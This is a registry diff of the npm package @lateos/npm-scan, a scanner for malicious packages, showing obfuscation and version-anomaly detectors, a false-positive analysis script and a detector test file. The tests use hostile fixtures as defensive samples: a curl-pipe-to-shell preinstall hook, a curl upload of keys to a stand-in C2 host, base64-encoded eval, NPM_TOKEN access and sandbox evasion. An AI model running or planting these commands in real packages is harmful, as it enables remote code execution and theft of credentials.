@lateos/npm-scan 0.18.3 → 1.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (46) hide show
  1. package/CHANGELOG.md +32 -0
  2. package/README.md +35 -0
  3. package/VALIDATION.md +92 -0
  4. package/backend/db/pg-schema.sql +155 -0
  5. package/backend/detectors/config/thresholds.js +66 -0
  6. package/backend/detectors/config/whitelist.json +74 -0
  7. package/backend/detectors/index.js +6 -0
  8. package/backend/detectors/lib/ast-patterns.js +21 -0
  9. package/backend/detectors/lib/entropy-analyzer.js +24 -0
  10. package/backend/detectors/tier1-binary-embed.js +34 -5
  11. package/backend/detectors/tier1-obfuscation-heuristics.js +156 -0
  12. package/backend/detectors/tier1-slsa-attestation.js +12 -0
  13. package/backend/detectors/tier1-version-anomaly.js +187 -0
  14. package/backend/detectors.test.js +88 -0
  15. package/backend/scripts/analyze-false-positives.js +146 -0
  16. package/backend/scripts/analyze-validation.js +151 -0
  17. package/backend/scripts/detect-false-positives.js +93 -0
  18. package/backend/scripts/fetch-top-packages.js +129 -0
  19. package/backend/scripts/validate-detectors.js +142 -0
  20. package/backend/tests-d5-enhanced.test.js +46 -0
  21. package/backend/tests-d6-version-anomaly.test.js +58 -0
  22. package/backend/tests-d6.test.js +116 -0
  23. package/backend/tests-d6c.test.js +106 -0
  24. package/backend/tests-d7-obfuscation.test.js +91 -0
  25. package/backend/tests.test.js +898 -0
  26. package/package.json +25 -8
  27. package/.dockerignore +0 -20
  28. package/.husky/pre-commit +0 -1
  29. package/SECURITY.md +0 -73
  30. package/deploy/helm/npm-scan/Chart.yaml +0 -22
  31. package/deploy/helm/npm-scan/templates/_helpers.tpl +0 -9
  32. package/deploy/helm/npm-scan/templates/api.yaml +0 -94
  33. package/deploy/helm/npm-scan/templates/ingress.yaml +0 -28
  34. package/deploy/helm/npm-scan/templates/postgresql.yaml +0 -67
  35. package/deploy/helm/npm-scan/templates/secrets.yaml +0 -19
  36. package/deploy/helm/npm-scan/templates/worker.yaml +0 -32
  37. package/deploy/helm/npm-scan/values.byoc.yaml +0 -75
  38. package/deploy/helm/npm-scan/values.yaml +0 -103
  39. package/scripts/download-corpus.js +0 -30
  40. package/scripts/gen-mal-corpus.js +0 -35
  41. package/scripts/generate-campaign-fixtures.js +0 -170
  42. package/src/config/top-5000.json +0 -87
  43. package/test/fixtures/lockfiles/npm-lock.json +0 -69
  44. package/test/fixtures/lockfiles/pnpm-lock.yaml +0 -118
  45. package/test/fixtures/lockfiles/yarn.lock +0 -104
  46. package/test/fixtures/mock-data.js +0 -69
@@ -0,0 +1,156 @@
1
+ import { KNOWN_REPUTABLE_PACKAGES } from '../policy.js';
2
+ import { shannonEntropy, isMinified } from './lib/entropy-analyzer.js';
3
+ import { detectPatterns } from './lib/ast-patterns.js';
4
+
5
const LIFECYCLE_SCRIPTS = ['preinstall', 'install', 'postinstall', 'prepare'];
const ENTROPY_THRESHOLD = 5.3;
const PAYLOAD_SIZE_THRESHOLD = 100000;

/**
 * Scores a piece of source text for obfuscation indicators.
 *
 * The score is an additive heuristic: entropy above ENTROPY_THRESHOLD, entropy
 * above 5.8, the number of patterns reported by detectPatterns(), minification,
 * payload size, and two pattern/entropy combinations each add points. The sum
 * is clamped to 0..100.
 *
 * @param {string|Uint8Array} code - Text to analyze. Any other type is rejected.
 * @param {string} [label] - Currently unused; kept so existing callers keep working.
 * @returns {object|null} A result object (flagged, confidenceScore, confidence,
 *   entropy, patterns, patternCount, payloadSize, flags), or null when the input
 *   is unusable, shorter than 20 units, or scores below 40.
 */
function analyze(code, label) {
  // package.json is attacker-controlled JSON: a script value can be a number,
  // array or object. Reject those up front instead of handing them to the
  // entropy/pattern helpers.
  // NOTE(review): byte buffers are still passed through unchanged in case a
  // caller supplies raw file bytes — confirm whether any caller does.
  const isAnalyzable = typeof code === 'string' || code instanceof Uint8Array;
  if (!isAnalyzable || code.length < 20) return null;

  const entropy = shannonEntropy(code);
  const patterns = detectPatterns(code);
  const minified = isMinified(code);
  const payloadSize = code.length;

  let score = 0;
  const flags = [];

  if (entropy > ENTROPY_THRESHOLD) {
    score += 35;
    flags.push(`Entropy ${entropy} exceeds threshold ${ENTROPY_THRESHOLD}`);
  }

  // Stacks on top of the base entropy bonus above.
  if (entropy > 5.8) {
    score += 15;
    flags.push(`High entropy ${entropy} — strong obfuscation indicator`);
  }

  const patternCount = patterns.length;
  if (patternCount >= 3) {
    score += 30;
    flags.push(`${patternCount} obfuscation patterns detected`);
  } else if (patternCount >= 1) {
    score += 20;
    flags.push(`${patternCount} obfuscation patterns detected`);
  }

  if (minified) {
    score += 10;
    flags.push('Minified code — reduced readability');
  }

  if (payloadSize > PAYLOAD_SIZE_THRESHOLD) {
    score += 15;
    flags.push(`Payload size ${payloadSize} bytes exceeds ${PAYLOAD_SIZE_THRESHOLD} byte threshold`);
  }

  if (patterns.includes('XOR_CIPHER') && patterns.length >= 2) {
    score += 10;
    flags.push('ctf-scramble-v2 style XOR cipher detected');
  }

  if (patterns.includes('EVAL_USAGE') && entropy > 5.0) {
    score += 15;
    flags.push('eval() with high-entropy code');
  }

  score = Math.max(0, Math.min(100, score));

  // Below 40 the signal is treated as noise and nothing is reported.
  if (score < 40) return null;

  return {
    flagged: true,
    confidenceScore: score,
    confidence: score >= 80 ? 'HIGH' : score >= 60 ? 'MEDIUM' : 'LOW',
    entropy,
    patterns,
    patternCount,
    payloadSize,
    flags,
  };
}
74
+
75
/**
 * Maps a 0-100 confidence score onto a severity name.
 *
 * @param {number} sc - Confidence score.
 * @returns {string} 'critical' (>= 90), 'high' (>= 70), 'medium' (>= 50), otherwise 'low'.
 */
function severityLabel(sc) {
  // Ordered from the highest floor down; the first floor the score reaches wins.
  const tiers = [
    [90, 'critical'],
    [70, 'high'],
    [50, 'medium'],
  ];
  const match = tiers.find(([floor]) => sc >= floor);
  return match ? match[1] : 'low';
}
81
+
82
/**
 * Maps a 0-100 confidence score onto a confidence band.
 *
 * @param {number} sc - Confidence score.
 * @returns {string} 'HIGH' (>= 80), 'MEDIUM' (>= 60), otherwise 'LOW'.
 */
function confidenceLabel(sc) {
  const isHigh = sc >= 80;
  const isMedium = sc >= 60;
  return isHigh ? 'HIGH' : isMedium ? 'MEDIUM' : 'LOW';
}
87
+
88
export const name = 'tier1-obfuscation-heuristics';

/**
 * Builds one finding record from an analyze() result.
 *
 * @param {object} result - Non-null result returned by analyze().
 * @param {string} subtype - Finding subtype.
 * @param {string} subject - Human-readable subject used in the message.
 * @param {string} evidenceHead - First evidence line identifying the subject.
 * @param {{file: string, line: number, column: number}} location - Reported location.
 * @returns {object} Finding record.
 */
function buildObfuscationFinding(result, subtype, subject, evidenceHead, location) {
  return {
    detector: 'tier1-obfuscation-heuristics',
    id: 'TIER1-OBFUSCATION-HEURISTICS',
    severity: severityLabel(result.confidenceScore),
    confidence: confidenceLabel(result.confidenceScore),
    confidenceScore: result.confidenceScore,
    subtype,
    message: `Obfuscation detected in ${subject}: ${result.flags[0] || 'obfuscation patterns found'}`,
    evidence: [
      evidenceHead,
      `entropy: ${result.entropy}`,
      `patterns: ${result.patterns.join(', ') || 'none'}`,
      `pattern_count: ${result.patternCount}`,
      `payload_size_bytes: ${result.payloadSize}`,
      ...result.flags,
    ],
    crossFiles: [],
    locations: [location],
    reference: 'Mini Shai-Hulud obfuscation campaign',
  };
}

/**
 * Runs the obfuscation heuristics over a package's lifecycle scripts and JS files.
 *
 * Packages whose name is in KNOWN_REPUTABLE_PACKAGES are skipped entirely.
 * Lifecycle scripts are reported whenever analyze() returns a result; JS files
 * additionally need a confidence score of at least 50 and at least 100
 * characters of content.
 *
 * @param {object} pkgJson - Parsed package.json (may be null/undefined).
 * @param {Array<{path?: string, content?: string}>} jsFiles - JS files to inspect.
 * @param {*} registryMeta - Unused by this detector.
 * @param {*} allFiles - Unused by this detector.
 * @returns {Promise<object[]>} Findings; empty when nothing is suspicious.
 */
export async function scan(pkgJson, jsFiles, registryMeta, allFiles) {
  const pkgName = pkgJson?.name;
  if (pkgName && KNOWN_REPUTABLE_PACKAGES.has(pkgName)) return [];

  const findings = [];
  const scripts = pkgJson?.scripts || {};

  for (const [hookName, scriptContent] of Object.entries(scripts)) {
    // package.json is untrusted input: a script value may be any JSON type.
    // Only strings can be executed as a script, so skip everything else
    // instead of feeding it to the analyzer.
    if (typeof scriptContent !== 'string') continue;
    if (!LIFECYCLE_SCRIPTS.includes(hookName)) continue;

    const result = analyze(scriptContent, hookName);
    if (!result) continue;

    findings.push(
      buildObfuscationFinding(
        result,
        'obfuscated_lifecycle_script',
        `${hookName} script`,
        `script: ${hookName}`,
        // NOTE(review): line/column are fixed placeholders, not the script's real position.
        { file: 'package.json', line: 3, column: 10 },
      ),
    );
  }

  for (const f of jsFiles || []) {
    // Tolerate holes or malformed entries in the file list rather than throwing.
    if (!f || typeof f !== 'object') continue;

    const content = f.content || '';
    if (content.length < 100) continue;

    const filePath = f.path || 'unknown.js';
    const result = analyze(content, filePath);
    if (!result) continue;

    // Files need a stricter score than lifecycle scripts before being reported.
    if (result.confidenceScore < 50) continue;

    findings.push(
      buildObfuscationFinding(
        result,
        'obfuscated_js_file',
        f.path || 'file',
        `file: ${filePath}`,
        { file: filePath, line: 0, column: 0 },
      ),
    );
  }

  return findings;
}
@@ -0,0 +1,12 @@
1
+ // D8: SLSA Attestation Mismatch Detector
2
+ // TODO: Implement after npm SLSA attestation API stabilizes
3
+ // Blockers:
4
+ // - npm registry SLSA attestation API not yet widely adopted (as of June 2026)
5
+ // - Requires npm auth token to fetch provenance
6
+ // - May have rate limits
7
+
8
export const name = 'tier1-slsa-attestation';

/**
 * Placeholder detector: the SLSA attestation check is not implemented yet,
 * so every call resolves to an empty findings list.
 *
 * @param {*} pkgJson - Unused.
 * @param {*} jsFiles - Unused.
 * @param {*} registryMeta - Unused.
 * @param {*} allFiles - Unused.
 * @returns {Promise<Array>} Always an empty array.
 */
export async function scan(pkgJson, jsFiles, registryMeta, allFiles) {
  const noFindings = [];
  return noFindings;
}
@@ -0,0 +1,187 @@
1
+ import { KNOWN_REPUTABLE_PACKAGES } from '../policy.js';
2
+
3
const SENTINEL_PATTERNS = new Set(['99.99.99', '11.11.11', '10.10.10']);

// A version component must be plain decimal digits. Number() alone would also
// accept '' (as 0), hex ('0x10'), exponents ('1e3'), signs and 'Infinity'.
const VERSION_PART_PATTERN = /^\d+$/;

/**
 * Parses a strict `major.minor.patch` version string.
 *
 * Anything that is not exactly three dot-separated decimal components is
 * rejected. That includes prerelease/build suffixes and non-version keys.
 *
 * @param {*} v - Candidate version string.
 * @returns {{major: number, minor: number, patch: number, full: string}|null}
 *   Parsed components plus the original string, or null when `v` is not a
 *   plain three-part numeric version.
 */
function parseVersion(v) {
  if (!v || typeof v !== 'string') return null;

  const parts = v.split('.');
  if (parts.length !== 3) return null;
  if (!parts.every((part) => VERSION_PART_PATTERN.test(part))) return null;

  const [major, minor, patch] = parts.map(Number);
  // Digit strings too long to be represented exactly would give misleading scores.
  if (![major, minor, patch].every(Number.isSafeInteger)) return null;

  return { major, minor, patch, full: v };
}
13
+
14
/**
 * Collapses a parsed version into a single comparable number.
 *
 * NOTE(review): the weights only keep versions ordered while minor and patch
 * stay below 100; e.g. 2.100.0 and 3.0.0 both score 30000.
 *
 * @param {{major: number, minor: number, patch: number}} v - Parsed version.
 * @returns {number} major * 10000 + minor * 100 + patch.
 */
function versionScore(v) {
  const { major, minor, patch } = v;
  const majorWeight = major * 10000;
  const minorWeight = minor * 100;
  return majorWeight + minorWeight + patch;
}
17
+
18
/**
 * Pulls every parseable version out of registry metadata.
 *
 * Accepts either an array of version strings or an object whose `versions`
 * (or, failing that, `time`) property is an object keyed by version string.
 * Entries that parseVersion() rejects are dropped.
 *
 * @param {*} registryMeta - Version list or registry metadata object.
 * @returns {object[]} Parsed versions; empty when nothing usable is found.
 */
function extractVersions(registryMeta) {
  const parseAll = (rawVersions) =>
    rawVersions.map((raw) => parseVersion(raw)).filter(Boolean);

  if (Array.isArray(registryMeta)) return parseAll(registryMeta);
  if (!registryMeta || typeof registryMeta !== 'object') return [];

  const versionMap = registryMeta.versions || registryMeta.time;
  if (!versionMap || typeof versionMap !== 'object') return [];

  return parseAll(Object.keys(versionMap));
}
30
+
31
/**
 * Computes summary statistics for a list of version scores.
 *
 * The standard deviation is the population form (divides by the sample count).
 *
 * @param {number[]} scores - Numeric scores.
 * @returns {{mean: number, stddev: number, max: number, min: number}|null}
 *   Statistics, or null when fewer than two scores are supplied.
 */
function computeStats(scores) {
  const count = scores.length;
  if (count < 2) return null;

  let total = 0;
  for (const value of scores) total += value;
  const mean = total / count;

  let squaredDeviationSum = 0;
  for (const value of scores) squaredDeviationSum += (value - mean) ** 2;
  const stddev = Math.sqrt(squaredDeviationSum / count);

  const max = Math.max(...scores);
  const min = Math.min(...scores);
  return { mean, stddev, max, min };
}
38
+
39
/**
 * Decides whether a package version is anomalous relative to its history.
 *
 * With fewer than two parseable historical versions, only the sentinel list
 * (SENTINEL_PATTERNS) can trigger a finding. Otherwise the current version's
 * score is compared against the (up to) 50 highest historical scores using a
 * z-score, the ratio to the historical maximum, and major-version heuristics.
 *
 * @param {string} packageName - Package name. Currently unused; kept for callers.
 * @param {string} versionStr - Version being evaluated.
 * @param {*} versionHistory - Array of version strings or registry metadata,
 *   as accepted by extractVersions().
 * @returns {object|null} Anomaly description (flagged, confidenceScore,
 *   confidence, zScore, baselineMax, baselineMean, reason, attackPattern), or
 *   null when the version cannot be parsed or nothing is anomalous.
 */
export function analyzeAnomaly(packageName, versionStr, versionHistory) {
  const current = parseVersion(versionStr);
  if (!current) return null;

  const historical = extractVersions(versionHistory);
  const isSentinel = SENTINEL_PATTERNS.has(versionStr);

  // Without at least two baseline versions no statistics can be computed, so
  // the sentinel list is the only signal available.
  if (!historical || historical.length < 2) {
    if (!isSentinel) return null;
    return {
      flagged: true,
      confidenceScore: 60,
      confidence: 'MEDIUM',
      zScore: null,
      baselineMax: 'unknown',
      baselineMean: 'unknown',
      reason: `Version ${versionStr} matches known dependency confusion pattern (no registry data to confirm)`,
      attackPattern: 'SENTINEL_PATTERN_ONLY',
    };
  }

  // From here on there are always >= 2 scores, so the former second
  // "insufficient history" branch could never run and has been removed.
  const currentScore = versionScore(current);
  const scores = historical.map(versionScore).sort((a, b) => a - b);
  const recentScores = scores.slice(-50); // the 50 highest scores, not the 50 newest releases

  const stats = computeStats(recentScores);
  if (!stats) return null; // defensive: computeStats only returns null for < 2 scores

  // A zero spread would divide by zero; treat it as "no deviation".
  const zScore = stats.stddev > 0 ? (currentScore - stats.mean) / stats.stddev : 0;
  const baselineMaxVer = historical.find((v) => versionScore(v) === stats.max)?.full || 'unknown';
  // Scores are weighted major * 10000, so dividing recovers an approximate major.
  const baselineMeanVal = (stats.mean / 10000).toFixed(1);
  const prevMaxMajor = Math.floor(stats.max / 10000);
  const isNormalMajorBump = current.major === prevMaxMajor + 1 && current.minor === 0 && current.patch === 0;
  const isReasonableVersion = current.major <= prevMaxMajor + 2 && current.major >= Math.floor(stats.min / 10000);
  const ratio = stats.max > 0 ? currentScore / stats.max : 0;

  let flagged = false;
  let confidenceScore = 0;
  let attackPattern = '';
  let reason = '';

  // Branches are ordered from strongest to weakest signal; the first match wins.
  if (isSentinel) {
    flagged = true;
    confidenceScore = 92;
    attackPattern = 'DEPENDENCY_CONFUSION_HIGH_VERSION';
    reason = `Version ${versionStr} matches known dependency confusion sentinel pattern; z-score ${zScore.toFixed(1)} vs baseline mean ${baselineMeanVal}`;
  } else if (zScore > 10 && !isNormalMajorBump) {
    flagged = true;
    confidenceScore = 90;
    attackPattern = 'Z_SCORE_EXTREME';
    reason = `Version ${versionStr} has z-score ${zScore.toFixed(1)} vs baseline mean ${baselineMeanVal} — extreme anomaly`;
  } else if (zScore > 5 && !isNormalMajorBump) {
    flagged = true;
    confidenceScore = 85;
    attackPattern = 'Z_SCORE_ANOMALY';
    reason = `Version ${versionStr} has z-score ${zScore.toFixed(1)} vs baseline mean ${baselineMeanVal} — strong anomaly`;
  } else if (zScore > 3 && !isNormalMajorBump) {
    flagged = true;
    confidenceScore = 72;
    attackPattern = 'Z_SCORE_ELEVATED';
    reason = `Version ${versionStr} has z-score ${zScore.toFixed(1)} vs baseline mean ${baselineMeanVal} — elevated anomaly`;
  } else if (ratio > 10 && !isNormalMajorBump) {
    flagged = true;
    confidenceScore = 75;
    attackPattern = 'MAJOR_VERSION_JUMP';
    reason = `Version ${versionStr} exceeds max historical version (${baselineMaxVer}) by factor of ${ratio.toFixed(1)}`;
  } else if (zScore > 2 && !isReasonableVersion) {
    flagged = true;
    confidenceScore = 55;
    attackPattern = 'SUSPICIOUS_VERSION';
    reason = `Version ${versionStr} has z-score ${zScore.toFixed(1)} and is outside expected version range`;
  }

  if (!flagged) return null;

  return {
    flagged,
    confidenceScore: Math.min(100, confidenceScore),
    confidence: confidenceLabel(confidenceScore),
    zScore: Math.round(zScore * 10) / 10,
    baselineMax: baselineMaxVer,
    baselineMean: baselineMeanVal,
    reason,
    attackPattern,
  };
}
142
+
143
/**
 * Translates a confidence score into the severity reported on a finding.
 *
 * @param {number} sc - Confidence score (0-100).
 * @returns {string} 'critical' from 90, 'high' from 70, 'medium' from 50, else 'low'.
 */
function severityLabel(sc) {
  const isCritical = sc >= 90;
  const isHigh = sc >= 70;
  const isMedium = sc >= 50;
  return isCritical ? 'critical' : isHigh ? 'high' : isMedium ? 'medium' : 'low';
}
149
+
150
/**
 * Translates a confidence score into a coarse confidence band.
 *
 * @param {number} sc - Confidence score (0-100).
 * @returns {string} 'HIGH' from 80, 'MEDIUM' from 60, else 'LOW'.
 */
function confidenceLabel(sc) {
  // Highest floor first; the first band whose floor is reached is returned.
  const bands = [
    { floor: 80, label: 'HIGH' },
    { floor: 60, label: 'MEDIUM' },
  ];
  for (const { floor, label } of bands) {
    if (sc >= floor) return label;
  }
  return 'LOW';
}
155
+
156
export const name = 'tier1-version-anomaly';

/**
 * Detector entry point: reports at most one finding when the package's own
 * version looks anomalous compared with the supplied registry metadata.
 *
 * Returns no findings when the package has no name or version, when the name
 * is in KNOWN_REPUTABLE_PACKAGES, or when analyzeAnomaly() finds nothing.
 *
 * @param {object} pkgJson - Parsed package.json (may be null/undefined).
 * @param {*} jsFiles - Unused by this detector.
 * @param {*} registryMeta - Version history passed through to analyzeAnomaly().
 * @param {*} allFiles - Unused by this detector.
 * @returns {Promise<object[]>} Zero or one finding.
 */
export async function scan(pkgJson, jsFiles, registryMeta, allFiles) {
  const pkgName = pkgJson?.name;
  const version = pkgJson?.version;

  const hasIdentity = Boolean(pkgName) && Boolean(version);
  if (!hasIdentity) return [];
  if (KNOWN_REPUTABLE_PACKAGES.has(pkgName)) return [];

  const anomaly = analyzeAnomaly(pkgName, version, registryMeta);
  if (!anomaly) return [];

  const score = anomaly.confidenceScore;
  const finding = {
    detector: 'tier1-version-anomaly',
    id: 'TIER1-VERSION-ANOMALY',
    severity: severityLabel(score),
    confidence: confidenceLabel(score),
    confidenceScore: score,
    subtype: anomaly.attackPattern.toLowerCase(),
    message: `Version anomaly detected in "${pkgName}": ${anomaly.reason}`,
    evidence: [
      `version: ${version}`,
      `baseline_max: ${anomaly.baselineMax}`,
      `baseline_mean: ${anomaly.baselineMean}`,
      // zScore is null when no baseline statistics were available.
      `z_score: ${anomaly.zScore ?? 'N/A'}`,
      `attack_pattern: ${anomaly.attackPattern}`,
    ],
    crossFiles: [],
    // NOTE(review): fixed placeholder position, not derived from the file.
    locations: [{ file: 'package.json', line: 3, column: 10 }],
    reference: '176-package dependency confusion campaign',
  };

  return [finding];
}
@@ -0,0 +1,88 @@
1
+ import { test } from 'node:test';
2
+ import assert from 'assert/strict';
3
+ import * as detectors from './detectors/index.js';
4
+
5
// An empty package must not produce any findings.
test('detectors runAll empty', async () => {
  const findings = await detectors.runAll({});
  assert.equal(findings.length, 0);
});

// Wraps a source snippet as the single-file list passed to runAll().
const singleFile = (content) => [{ path: 'i.js', content }];

// One entry per attack detector: the runAll() arguments that should trigger it,
// the finding id expected in the output, and the assertion failure message.
const ATTACK_CASES = [
  {
    title: 'ATK-001 detects preinstall',
    id: 'ATK-001',
    args: [{ scripts: { preinstall: 'curl http://c2.example.com/x.sh | sh' } }],
    failure: 'Expected ATK-001',
  },
  {
    title: 'ATK-002 detects eval+decode',
    id: 'ATK-002',
    args: [{}, singleFile('eval(atob("Y3VybCBodHRwOi8vYzIuZXZpbC5jb20="))')],
    failure: 'Expected ATK-002',
  },
  {
    title: 'ATK-003 detects cred env vars',
    id: 'ATK-003',
    args: [{}, singleFile('console.log(process.env.NPM_TOKEN)')],
    failure: 'Expected ATK-003',
  },
  {
    title: 'ATK-004 detects editor persistence',
    id: 'ATK-004',
    args: [{}, singleFile('fs.mkdirSync(".vscode")')],
    failure: 'Expected ATK-004',
  },
  {
    title: 'ATK-005 detects network exfil',
    id: 'ATK-005',
    args: [{}, singleFile('curl --data-binary @keys http://c2.evil.com')],
    failure: 'Expected ATK-005',
  },
  {
    title: 'ATK-006 detects dep confusion',
    id: 'ATK-006',
    args: [{ dependencies: { 'acorn-squatter': '1.0.0' } }],
    failure: 'Expected ATK-006',
  },
  {
    title: 'ATK-007 detects typosquatting',
    id: 'ATK-007',
    args: [{ dependencies: { 'lodash': 'latest', 'loddsh': '1.0.0' } }],
    failure: 'Expected ATK-007 for loddsh',
  },
  {
    title: 'ATK-008 detects tarball tampering',
    id: 'ATK-008',
    args: [{ name: 'lodash', repository: { url: 'https://github.com/attacker/lodash-evil.git' } }],
    failure: 'Expected ATK-008',
  },
  {
    title: 'ATK-009 detects CI env trigger',
    id: 'ATK-009',
    args: [{}, singleFile('if (process.env.CI) { eval(atob("ZXZpbA==")) }')],
    failure: 'Expected ATK-009',
  },
  {
    title: 'ATK-010 detects sandbox evasion',
    id: 'ATK-010',
    args: [{}, singleFile('if (os.hostname().includes("sandbox")) { process.exit(0) }')],
    failure: 'Expected ATK-010',
  },
  {
    title: 'ATK-011 detects transitive propagation',
    id: 'ATK-011',
    args: [{}, singleFile('exec("npm install ./malicious-pkg")')],
    failure: 'Expected ATK-011',
  },
];

for (const { title, id, args, failure } of ATTACK_CASES) {
  test(title, async () => {
    const findings = await detectors.runAll(...args);
    assert(findings.some((f) => f.id === id), failure);
  });
}

// A benign package may yield low-severity noise but nothing high or critical.
test('no false positives on clean package', async () => {
  const pkg = {
    name: 'test-pkg',
    version: '1.0.0',
    scripts: { test: 'node test.js' },
    dependencies: { 'express': '4.0.0' },
  };
  const files = [{ path: 'index.js', content: 'module.exports = function() { return 42 }' }];
  const findings = await detectors.runAll(pkg, files);
  const blockingSeverities = ['high', 'critical'];
  const highCrit = findings.filter((f) => blockingSeverities.includes(f.severity));
  assert.equal(highCrit.length, 0, `Expected no high/crit findings on clean pkg: ${JSON.stringify(highCrit)}`);
});
83
+
84
// Smoke check of the module surface. The previous version was titled
// "all 11 ATK IDs present" and built a list of the 11 ids, but never used it:
// the only assertion was that `runAll` is exported. The title now states what
// is actually verified; each ATK id is covered by its own test in this file.
test('detectors module exports runAll', async () => {
  const exportedNames = Object.keys(detectors);
  assert.equal(exportedNames.includes('runAll'), true);
  assert.equal(typeof detectors.runAll, 'function');
});
@@ -0,0 +1,146 @@
1
+ #!/usr/bin/env node
2
+ import { readFileSync, existsSync, writeFileSync } from 'node:fs';
3
+ import { resolve } from 'node:path';
4
+
5
/**
 * Aggregates a JSONL file of false-positive findings into per-detector and
 * per-package statistics.
 *
 * Each non-blank line must be a JSON object with `detector`, `package`,
 * `version`, `severity`, `subtype` and a confidence value. Detectors with five
 * or more false positives are listed in `high_fp_detectors` and get an entry
 * in `recommendations`.
 *
 * Terminates the process with exit code 1 when the file does not exist.
 *
 * @param {string} fpFile - Path to the JSONL file (resolved against the cwd).
 * @returns {object} Analysis with total_fps, detectors, high_fp_detectors,
 *   recommendations and per_package. `scanned_packages` and `fp_rate` are
 *   placeholders that this function never updates.
 * @throws {SyntaxError} When a line is not valid JSON (message includes the line number).
 * @throws {TypeError} When a line parses to something other than an object.
 */
function analyzeFalsePositives(fpFile) {
  const analysis = {
    total_fps: 0,
    scanned_packages: 0,
    fp_rate: '0%',
    // Keys come from the input file. Null-prototype dictionaries keep names
    // such as "constructor" or "__proto__" from resolving to inherited members.
    detectors: Object.create(null),
    high_fp_detectors: [],
    recommendations: [],
    per_package: Object.create(null),
  };

  const absPath = resolve(fpFile);
  if (!existsSync(absPath)) {
    console.error(`[ERROR] False positives file not found: ${absPath}`);
    process.exit(1);
  }

  const rawLines = readFileSync(absPath, 'utf-8').split('\n');

  for (const [index, rawLine] of rawLines.entries()) {
    if (!rawLine.trim()) continue;

    let fp;
    try {
      fp = JSON.parse(rawLine);
    } catch (err) {
      // Still fails loudly, but says which line is broken.
      throw new SyntaxError(`Invalid JSON on line ${index + 1} of ${absPath}: ${err.message}`, { cause: err });
    }
    if (fp === null || typeof fp !== 'object') {
      throw new TypeError(`Expected a JSON object on line ${index + 1} of ${absPath}`);
    }

    analysis.total_fps += 1;

    // Findings carry a textual `confidence` band plus a numeric
    // `confidenceScore`; prefer whichever is numeric so averages stay meaningful.
    // NOTE(review): confirm which of the two the file writer actually emits.
    const confidence = typeof fp.confidence === 'number'
      ? fp.confidence
      : fp.confidenceScore ?? fp.confidence;

    const detector = fp.detector;
    if (!analysis.detectors[detector]) {
      analysis.detectors[detector] = {
        fp_count: 0,
        avg_confidence: 0,
        confidences: [],
        severities: [],
        examples: [],
        unique_packages: new Set(),
      };
    }

    const detectorStats = analysis.detectors[detector];
    detectorStats.fp_count += 1;
    detectorStats.confidences.push(confidence);
    detectorStats.severities.push(fp.severity);
    detectorStats.unique_packages.add(fp.package);

    // Keep only the first few examples per detector for the report.
    if (detectorStats.examples.length < 5) {
      detectorStats.examples.push({
        package: fp.package,
        version: fp.version,
        confidence,
        subtype: fp.subtype,
      });
    }

    if (!analysis.per_package[fp.package]) {
      analysis.per_package[fp.package] = [];
    }
    analysis.per_package[fp.package].push({
      detector: fp.detector,
      confidence,
      version: fp.version,
    });
  }

  for (const [detectorName, stats] of Object.entries(analysis.detectors)) {
    // Average over numeric values only; a stray label would otherwise turn the
    // sum into string concatenation and the average into NaN.
    const numericConfidences = stats.confidences.filter(
      (value) => typeof value === 'number' && Number.isFinite(value),
    );
    // Stored as a fixed-point string because the report pads it as text.
    stats.avg_confidence = numericConfidences.length > 0
      ? (numericConfidences.reduce((a, b) => a + b, 0) / numericConfidences.length).toFixed(1)
      : '0.0';
    stats.unique_package_count = stats.unique_packages.size;
    // Sets do not survive JSON.stringify, so only the count is kept.
    delete stats.unique_packages;

    const fpShare = (stats.fp_count / analysis.total_fps * 100).toFixed(1);

    if (stats.fp_count >= 5) {
      analysis.high_fp_detectors.push(detectorName);
      analysis.recommendations.push({
        detector: detectorName,
        fp_count: stats.fp_count,
        unique_packages: stats.unique_package_count,
        share_of_total_fps: fpShare + '%',
        avg_confidence: stats.avg_confidence,
        severity_distribution: stats.severities.reduce((acc, s) => {
          acc[s] = (acc[s] || 0) + 1;
          return acc;
        }, Object.create(null)),
        suggested_action: `Increase confidence threshold from current to ${Math.min(100, Math.ceil(parseFloat(stats.avg_confidence)) + 5)}`,
        examples: stats.examples,
      });
    }
  }

  return analysis;
}
94
+
95
// CLI driver: analyze the given JSONL file (default: false-positives.jsonl),
// print a console report, and write the full analysis to fp-analysis.json.
const fpFile = process.argv[2] || 'false-positives.jsonl';

console.log(`[INFO] Analyzing ${fpFile}...`);
const analysis = analyzeFalsePositives(fpFile);

// --- Summary -----------------------------------------------------------------
const detectorCount = Object.keys(analysis.detectors).length;
console.log('\n=== FALSE POSITIVE ANALYSIS ===');
console.log(`Total FPs: ${analysis.total_fps}`);
console.log(`Detectors with FPs: ${detectorCount}`);

const hasHighFpDetectors = analysis.high_fp_detectors.length > 0;
console.log(
  hasHighFpDetectors
    ? `\nHigh-FP detectors (>= 5 FPs): ${analysis.high_fp_detectors.join(', ')}`
    : '\nNo high-FP detectors found (all < 5 FPs) — thresholds are well-calibrated'
);

// --- Per-detector table, noisiest detector first -------------------------------
console.log('\n=== PER-DETECTOR BREAKDOWN ===');
console.log('Detector FPs UniquePkgs AvgConf Top Examples');
console.log('─'.repeat(90));

const byFpCountDesc = (a, b) => b[1].fp_count - a[1].fp_count;
const rankedDetectors = Object.entries(analysis.detectors).sort(byFpCountDesc);
for (const [detectorName, detectorStats] of rankedDetectors) {
  const columns = [
    detectorName.padEnd(32).slice(0, 32),
    String(detectorStats.fp_count).padStart(4),
    String(detectorStats.unique_package_count).padStart(11),
    // avg_confidence is a string produced by toFixed(), hence padStart works.
    detectorStats.avg_confidence.padStart(7),
    detectorStats.examples.slice(0, 2).map((e) => e.package).join(', '),
  ];
  console.log(columns.join(' '));
}

// --- Recommendations ---------------------------------------------------------
console.log('\n=== RECOMMENDATIONS ===');
if (analysis.recommendations.length === 0) {
  console.log('No threshold adjustments needed — FP rates are within acceptable bounds.');
} else {
  for (const rec of analysis.recommendations) {
    console.log(`\n${rec.detector}:`);
    console.log(` FPs: ${rec.fp_count} (${rec.share_of_total_fps} of total) across ${rec.unique_packages} unique packages`);
    console.log(` Avg confidence: ${rec.avg_confidence}`);
    console.log(` Severity breakdown: ${JSON.stringify(rec.severity_distribution)}`);
    console.log(` Suggestion: ${rec.suggested_action}`);
    console.log(` Examples:`);
    for (const ex of rec.examples.slice(0, 3)) {
      console.log(` ${ex.package}@${ex.version} (${ex.confidence}%) [${ex.subtype}]`);
    }
  }
}

// --- Persist the full analysis ---------------------------------------------------
